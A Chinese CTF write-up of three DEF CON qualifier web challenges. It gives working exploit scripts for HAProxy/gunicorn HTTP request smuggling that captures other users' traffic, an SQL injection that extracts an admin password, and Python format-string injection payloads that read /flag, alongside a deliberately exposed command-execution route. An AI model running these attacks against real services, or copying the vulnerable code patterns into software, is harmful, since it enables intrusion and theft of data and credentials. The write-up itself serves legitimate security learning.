打了一波defcon qual,不愧为CTF的殿堂级比赛,还是学到了很多新东西的。

uploooadit

这个题目还是很有意思的,也学到了新姿势,里面涉及了HTTP Smuggling,在这篇文章里就不展开叙述后,后续会补一篇进行详细介绍。

首先对题目给的源码进行分析,题目环境OOO(Order-of-the-Overflow)Git中已经给出来了。

import os
import re

from flask import Flask, abort, request

import store

GUID_RE = re.compile(
r"\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\Z"
)

app = Flask(__name__)
app.config["MAX_CONTENT_LENGTH"] = 512
filestore = store.S3Store()

# Uncomment the following line for simpler local testing of this service

# filestore = store.LocalStore()


@app.route("/files/", methods=["POST"])
def add_file():
if request.headers.get("Content-Type") != "text/plain":
abort(422)

guid = request.headers.get("X-guid", "")
if not GUID_RE.match(guid):
abort(422)

filestore.save(guid, request.data)
return "", 201

@app.route("/files/<guid>", methods=["GET"])
def get_file(guid):
if not GUID_RE.match(guid):
abort(422)

try:
return filestore.read(guid), {"Content-Type": "text/plain"}
except store.NotFound:
abort(404)

@app.route("/", methods=["GET"])
def root():
return "", 204
"""Provides two instances of a filestore.

There is not intended to be any vulnerability contained within this code. This file is provided to

make it easier to test locally without needing access to an S3 bucket.

-OOO

"""
import os

import boto3
import botocore

class NotFound(Exception):
pass

class LocalStore:
def __init__(self):
import tempfile
self.upload_directory = tempfile.mkdtemp()

def read(self, key):
filepath = os.path.join(self.upload_directory, key)

try:
with open(filepath, "rb") as fp:
return fp.read()
except FileNotFoundError:
raise NotFound

def save(self, key, data):
with open(os.path.join(self.upload_directory, key), "wb") as fp:
fp.write(data)

class S3Store:
"""Credentials grant access only to resource s3://BUCKET/* and only for:


* GetObject

* PutObject

"""

def __init__(self):
self.bucket = os.environ["BUCKET"]
self.s3 = boto3.client("s3")

def read(self, key):
try:
response = self.s3.get_object(Bucket=self.bucket, Key=key)
except botocore.exceptions.ClientError as exception:
if exception.response["ResponseMetadata"]["HTTPStatusCode"] == 403:
raise NotFound
# No other exceptions encountered during testing

return response["Body"].read()

def save(self, key, data):
self.s3.put_object(
Body=data, Bucket=self.bucket, ContentType="text/plain", Key=key
)

审源码发现,题目可以通过s3://BUCKET/上传文件,并且可以查看文件。于是开始尝试看是否可以查看到一些有用的文件,可以发现文件保存和查看使用的是uuid,于是写脚本读了一些文件,但是发现并没有什么有用的信息。

没啥思路,开始搜集一些其他信息,先看看http报文,发现在response中有一些信息:

可以看到这个题使用了haproxy 1.9.10作为代理,并且这里是可以知道题目后端使用的是gunicorn的,谷歌一下,看看是否存在什么漏洞。发现haproxy中有一个smuggling的洞,这里也需要再确定一下,这个版本是否有修改这一漏洞,到releases可以看到,该漏洞的fix是在20.0.1版本才上的。

这里再仔细看一下这个利用方式,Smuggling其实是利用了HTTP协议本身的问题:HTTP中存在两种方式来指定请求的结束位置。因此,相同的HTTP请求,不同的服务器可能会产生不同的处理结果,这样就产生了安全风险。

比如你发了一个实际长501的包,前部服务器认为它是501长没错,但是后部服务器却以为它是250。而剩下的251长度呢?它被储存到了服务器的缓存中,当下个http包过来的时候,他就会把那部分剩下的包给加在下个包前面。而这251长拼接进去的包就是http请求走私的包。

而在这个题目中所涉及的haproxy的请求走私,其实是因为haproxygunicorn都是遵循RFC2616的实现,haproxy处理的时候是按Content-Length解析的,然后在发往后端gunicorn的时候把Content-Length抛弃了,只留下Transfer-Encoding,从而引发了HTTP Smuggling

这题的思路,其实就是利用这个请求走私,偷请求流量,这里先写一个脚本跑一下看看能偷到什么:先上传文件,然后用\x0b绕过haproxy的识别。再用一个很长的Content-Length,将第2个请求走私,从而偷到流量,第2个请求就是个简单的文件上传就行了,最后读取第2个请求的guid对应的文件。

import socket
import ssl
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def https():
context = ssl.create_default_context()
data = b'''4
abcd
0

POST /files/ HTTP/1.1
Host: uploooadit.oooverflow.io
X-guid: 99999999-9999-9999-9999-999999999900
Content-Type: text/plain
Content-Length: 512


'''.replace(b'\n', b'\r\n')
p = b'''POST /files/ HTTP/1.1
Host: uploooadit.oooverflow.io
Content-Type: text/plain
X-guid: 12345678-9123-4567-8912-1234567890ac
Content-Length: ''' + str(len(data)).encode() + b'''
Transfer-Encoding: \x0cchunked

'''
p = p.replace(b'\n', b'\r\n') + data
with socket.create_connection(('uploooadit.oooverflow.io', 443), timeout=5) as conn:
with context.wrap_socket(conn, server_hostname='uploooadit.oooverflow.io') as sconn:
sconn.send(p)
sconn.recv(10240).decode()


def getone():
url = "https://uploooadit.oooverflow.io/files/99999999-9999-9999-9999-999999999900"
res = requests.get(url=url, verify=False)
return res.text


if __name__ == "__main__":
content = ""
while True:
try:
https()
tmpcon = getone()
if content != tmpcon:
content = tmpcon
with open('run.log','a+') as f:
f.write(content + '\n')
except:
pass

这里跑的时候发现可以偷到各种请求,应该是偷到了别的队伍的,证明这个漏洞的确有用,但是没拿到flag,猜测是因为流量太多了,于是慢慢等,过了很久之后拿到一个流量,里面有一截flag,应该是主办方有设置一个Bot在上传flag文件

OOO{That girl thinks she's the queen of the ne

继续跑,但是一直不全,跑了好久后终于拿到了…(后面才发现这个flag里面的内容原来是歌词,其实可以根据Content-Length长度和歌词来猜flag的)

OOO{That girl thinks she's the queen of the neighborhood/She's got the hottest trike in town/That girl she holds her head up so high/I think I wanna be her best friend, yeah}

这里也给一下官方提供的EXP

#!/usr/bin/env python3
import socket
import ssl
import sys
import uuid

import requests

CLTE_TEMPLATE = """GET / HTTP/1.1
Host: {hostname}
User-Agent: attacker
Content-Length: {length}
Transfer-Encoding:\x0bchunked
0
"""
GUID = str(uuid.uuid4())

def request(content, hostname, port):
print(content)
print()

def issue_request(server):
assert server.send(content) == len(content)
data = server.recv(1024)
while len(data) > 0:
print(data.decode("utf-8"))
data = server.recv(1024)

with socket.create_connection((hostname, port)) as raw_socket:
if port == 443:
context = ssl.create_default_context()
with context.wrap_socket(raw_socket, server_hostname=hostname) as server:
issue_request(server)
else:
issue_request(raw_socket)
try:
raw_socket.shutdown(socket.SHUT_RDWR)
except:
pass

def clte(payload, hostname):
offset = 5 + payload.count("\n")
return (
(CLTE_TEMPLATE.format(hostname=hostname, length=len(payload) + offset) + payload)
.replace("\n", "\r\n")
.encode("utf-8")
)

def main():
if len(sys.argv) == 2 and sys.argv[1] == "--local":
hostname = "localhost"
port = 8080
url = f"http://localhost:8080/files/{GUID}"
else:
hostname = "uploooadit.oooverflow.io"
port = 443
url = f"https://uploooadit.oooverflow.io/files/{GUID}"

payload = f"""POST /files/ HTTP/1.1
Connection: close
Content-Length: 385
Content-Type: text/plain
User-Agent: hacked
X-guid: {GUID}
"""
request(clte(payload, hostname), hostname, port)
response = requests.get(url)
print(response.content.decode("utf-8"))

if __name__ == "__main__":
sys.exit(main())

Ooonline Class

题目环境主办方已给出

这题没来得及做,在Dogooos中踩坑踩了半天,等出坑已经快结束了,后续看了下其他师傅的解法,好像题目一出来就有了非预期解,在登录处直接用SQL injection即可拿到smart账号,附上主办方给的EXP:

#!/usr/bin/env python3

import json
import random
import requests
import sys
import time

import logging
logging.basicConfig(level=logging.DEBUG)

def main():

host = sys.argv[1]
port = int(sys.argv[2])

url = f"http://{host}:{port}"

username = f"attack{random.randint(0, 1000000)}"
passwd = "testing"

exploit_username = f"{username}','{passwd}')returning(id),(select(password)from\"users\"where(id)=1)--"

result = requests.post(f"{url}/user/register",
json=dict(name=exploit_username,
passwd=passwd))
assert result.status_code == 200
r = result.json()
admin_pass = r['returning_from_db_name']
assert admin_pass == "zKSTznZYGD"

username = f"test{random.randint(0, 1000000)}"
passwd = "testing"

result = requests.post(f"{url}/user/register",
json=dict(name=username,
passwd=passwd))
assert result.status_code == 200
r = result.json()
assert 'id' in r

result = requests.post(f"{url}/user/login",
json=dict(name=username,
passwd=passwd))
assert result.status_code == 200
r = result.json()
token = r['token']

auth_headers = {"X-Auth-Token": token}

done = False
while not done:
result = requests.post(f"{url}/assignment/1/submissions",
json=dict(file=open('solution.c', 'r').read()),
headers=auth_headers)
r = result.json()
id = r['id']

time.sleep(4)

while True:

result = requests.get(f"{url}/submission/{id}/result",
headers=auth_headers)
r = result.json()
print(r)

if 'retry' in r:
time.sleep(4)
else:
if 'Success' in r['message']:
print(r['message'][9:])
sys.exit(0)
else:
print('trying again')
break

sys.exit(-1)

if __name__ == '__main__':
main()

Dogooos

fstring的格式化字符串漏洞,题目环境也已经给出。

题目是给了源码的,先对源码进行审计,这题实际上是有个坑的,在dogooo_comments.py中有这么一段,天真的以为是命令执行,饶了半天waf,但是一直没用…(赛后看了一下,发现官方给了这么一个note 2333:Although there was a promising route in the script for executing local commands /runcmd. It would error because of the seccomp filter which prevented execve.)

@app.route("/dogooo/runcmd", methods=["GET","POST"])
def run_cmd():
cmd = request.form.get('cmd')
if not cmd or cmd == "":
cmd = "ls -la /tmp".split(" ")
print(f"here {cmd}")
import subprocess
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
print("STDOUT:")
print(stdout)
return stdout

后面再想是否不是命令绕过,或者是否有什么没注意到的,于是继续审代码,发现在loaddata.py中有两处使用了fstring

from fstring import fstring as f
······
class User(UserMixin):

def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password

def __repr__(self):
return "%d/%s/%s" % (self.id, self.username, self.password)

def get_user_info(self):
return f(self.username)

······

class Post(object):
def __init__(self, id, message, rating, pic_loc):
self.id = id
self.rating = rating
self._message = message
self.pic_loc = pic_loc
self.author = ""
self.comments = list()

@property
def message(self):

return self._message

@message.setter
def message(self, msg):
self._message = msg

def add_comment(self, comment, commenter, preview=False):
self.comments.append(Comment(comment, commenter, preview))

def get_comments(self):
out = ""
for ccnt, cmt in enumerate(self.comments):
fmt_cmt = cmt.comment.format(rating=self.__dict__)
form_save = f"""
<form action="/dogooo/deets/add/{self.id}" method="POST">
<input type=hidden id="comment" name="comment" value='{fmt_cmt}'></textarea>
<input type=hidden id="commenter" name="commenter" value='{cmt.author}'/>
<input type=submit value="Save" />
</form>
"""
if cmt.preview:
out += f"<ul class='square'>{fmt_cmt} - {cmt.author} {form_save} </ul>\n"
else:
out += f"<ul class='square'>{fmt_cmt} - {cmt.author}</ul>\n"

return out

这里猜测是否是利用fstring的格式化字符串漏洞,可以看一下P神的文章,以及安全客上的一篇

继续审源码,发现这里的get_user_info函数是在用户登录时候调用,也就是说,如果可以利用格式化字符串漏洞,创建一个用户,将命令注入到username中,那么在登录时就可以执行命令了。

另外,这里需要一个能够创建账户登录的用户,这里利用使用了fstring的第二处——get_comments函数,另外在这里发现有一个叫post_results的全局变量,读取一下试试:

{rating[comments][0].__init__.__globals__[post_results]}

读取结果

可以拿到一个作者用户,登录后修改用户名为读取flag的命令

{open('/flag').read()}

再登录即可拿到flag

这个题,后续看了下其他师傅的WP,貌似还有个模板注入可以直接解

@app.route("/dogooo/deets/<postid>", methods=["GET","POST"])